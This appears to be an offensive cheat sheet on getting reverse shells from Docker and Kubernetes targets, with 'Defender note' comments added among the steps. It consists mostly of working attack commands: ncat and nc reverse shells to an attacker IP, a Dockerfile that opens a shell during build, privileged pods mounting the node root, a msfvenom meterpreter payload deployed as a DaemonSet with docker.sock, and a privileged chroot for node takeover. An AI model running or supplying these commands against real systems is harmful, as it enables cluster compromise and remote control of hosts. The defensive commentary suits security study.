Get Reverse Shell (Docker/K8s)
Docker run
Attacker:
ncat -l -p 8989
Target System:
docker run raesene/ncat <attacker_IP> 8989 -e /bin/sh
Dockerfile
Attacker:
ncat -l -p 8989
Target System:
# Defender note: the outbound connection is made by a RUN step, i.e. inside the
# build container while `docker build` runs, not in a container started from the
# finished image. The exposure is therefore the build host (CI runner or
# developer machine): builders need the same egress filtering and audit as
# runtime nodes, and untrusted Dockerfiles should not be built on privileged
# runners. `ubuntu:18.04` and `apt install -y ncat` are unpinned, so the image
# is also not reproducible.
FROM ubuntu:18.04
RUN apt update && apt install -y ncat
RUN ncat <attacker_IP> 8989 -e /bin/sh
CMD ["/bin/bash"]
From compromised Pod
Attacker:
ncat -l -p 8989
Target System:
# Defender note: `--insecure-skip-tls-verify=true` plus a bearer `--token` means
# a service-account token read from a compromised Pod is all that is needed to
# talk to the API server. The `--overrides` body requests
# `"securityContext":{"privileged":true}`; a Pod Security Admission level of
# baseline or restricted rejects that, and API audit logs should alert on pod
# creation from in-cluster identities that carry `privileged: true`, `stdin`
# and `tty`. Limit service-account token mounts
# (`automountServiceAccountToken: false`) where a workload does not need the API.
kubectl --server=https://K8S_HOST:K8S_PORT
--insecure-skip-tls-verify=true
--token="<TOKEN>"
run --rm -it busybox --image=busybox --restart=Never
--overrides='{"apiVersion": "v1",
"spec":{"containers":[{"name":"busybox","image":"busybox",
"stdin":true, "tty":true, "command":["/bin/nc",
"192.168.42.1", "8989", "-e", "/bin/ash", "-i"],
"securityContext":{"privileged":true}}]}}'
K8s cluster
Attacker:
ncat -l -p 8989
Target System:
# Defender note: this Pod mounts the node's root filesystem (`hostPath` with
# `path: /`, no `readOnly`) at /host, so whatever the container runs has
# read/write access to the whole node. hostPath volumes are forbidden at the
# Pod Security Standards "baseline" level; an admission policy that rejects
# hostPath (or at least `/`) and pulls from non-allow-listed registries
# (`image: raesene/ncat`) blocks this manifest before it is scheduled.
# (Indentation was lost when the page was extracted; the lines below are
# shown flattened.)
apiVersion: v1
kind: Pod
metadata:
name: ncat-reverse-shell-pod
labels:
app: ncat
spec:
containers:
- name: ncat-reverse-shell
image: raesene/ncat
volumeMounts:
- mountPath: /host
name: hostvolume
args: ['<attacker_IP>', '8989', '-e', '/bin/bash']
volumes:
- name: hostvolume
hostPath:
path: /
type: Directory
Reverse shell on every node
Attacker:
# Defender note: the payload built here beacons back over HTTP to
# <attacker_IP>:8989, so egress filtering from nodes and pods, plus proxy logs
# of unexpected outbound HTTP from cluster workloads, are the detection points.
# The image is pushed to a public registry; an allow-list of trusted registries
# enforced at admission stops the Target System steps from pulling it at all.
# Create payload
$ docker run raesene/metasploit ./msfvenom -p linux/x64/meterpreter_reverse_http LHOST=<attacker_IP> LPORT=8989 -f elf > reverse_shell.elf
# Setup docker image
$ curl https://download.docker.com/linux/ubuntu/gpg > docker.gpg
# Build and push to docker hub
$ docker build -t raesene/reverse_shell .
$ docker push raesene/reverse_shell
# Setup metasploit
$ msfconsole
> use exploit/multi/handler
> set payload linux/x64/meterpreter_reverse_http
> set LHOST <attacker_IP>
> set LPORT 8989
> set ExitOnSession false
> exploit -j
$ cat Dockerfile
# Defender note: the final layer contains a Docker client (`docker-ce-cli`) and
# an opaque ELF copied in and run as CMD. Together with the docker.sock hostPath
# in the DaemonSet that follows, the Docker client is what turns a container
# shell into control of the node's Docker daemon. Image scanning and admission
# rules should flag images that ship a container-runtime client unless the
# workload is known to need one, and unsigned/unscanned executables run as CMD.
# `apt update`, `apt-key add` and the unpinned `docker-ce-cli` install also make
# the image non-reproducible.
FROM ubuntu:18.04
RUN apt update && apt install -y apt-transport-https ca-certificates curl software-properties-common
COPY docker.gpg /docker.gpg
RUN apt-key add /docker.gpg
RUN add-apt-repository \
"deb [arch=amd64] https://download.docker.com/linux/ubuntu \
$(lsb_release -cs) \
stable"
RUN apt-get install -y docker-ce-cli
COPY reverse_shell.elf /reverse_shell.elf
RUN chmod +x /reverse_shell.elf
CMD ["/reverse_shell.elf"]
Target System:
# Defender note: `kubectl create` of a DaemonSet needs `create` on
# `daemonsets.apps`; a DaemonSet is the natural way to place one Pod on every
# node at once, so API audit alerts on DaemonSet creation by identities other
# than the platform/GitOps tooling give early warning here.
# Get single shell
$ docker run raesene/reverse_shell
# Get shell inside container on each node
$ kubectl create -f reverse-shell-daemonset.yml
$ cat reverse-shell-daemonset.yml
# Defender note: the `node-role.kubernetes.io/master` toleration lets the Pod
# schedule onto control-plane nodes as well, and the `/var/run/docker.sock`
# hostPath hands the container the node's Docker daemon socket. Reject hostPath
# mounts of container-runtime sockets at admission (PSS "baseline" forbids
# hostPath entirely), and alert on workloads outside system namespaces that
# tolerate control-plane taints. `metadata.labels` is empty in this manifest;
# the selector matches on the template labels only.
# (Indentation was lost when the page was extracted; the lines below are
# shown flattened.)
apiVersion: apps/v1
kind: DaemonSet
metadata:
name: reverse-shell-daemonset
labels:
spec:
selector:
matchLabels:
name: reverse-shell-daemonset
template:
metadata:
labels:
name: reverse-shell-daemonset
spec:
tolerations:
- key: node-role.kubernetes.io/master
effect: NoSchedule
containers:
- name: revshell
image: raesene/reverse-shell
volumeMounts:
- mountPath: /var/run/docker.sock
name: dockersock
volumes:
- name: dockersock
hostPath:
path: /var/run/docker.sock
Attacker:
# Defender note: the last `docker run` creates a container with `--privileged`,
# the host's net/pid/ipc namespaces and the node root bind-mounted, then
# `chroot`s into it; issued through the mounted docker.sock this is full node
# compromise. Runtime detection: container-runtime events showing a privileged
# start with host namespaces and a `/` bind mount; prevention: never mount the
# runtime socket into workloads, and enforce non-privileged pod security so the
# DaemonSet above cannot reach the socket in the first place.
# Get shells
msf> sessions -l
# Get root on underlying host
msf> sessions -i 1
msf> shell
$ docker run -ti --privileged --net=host --pid=host --ipc=host --volume /:/host busybox chroot /host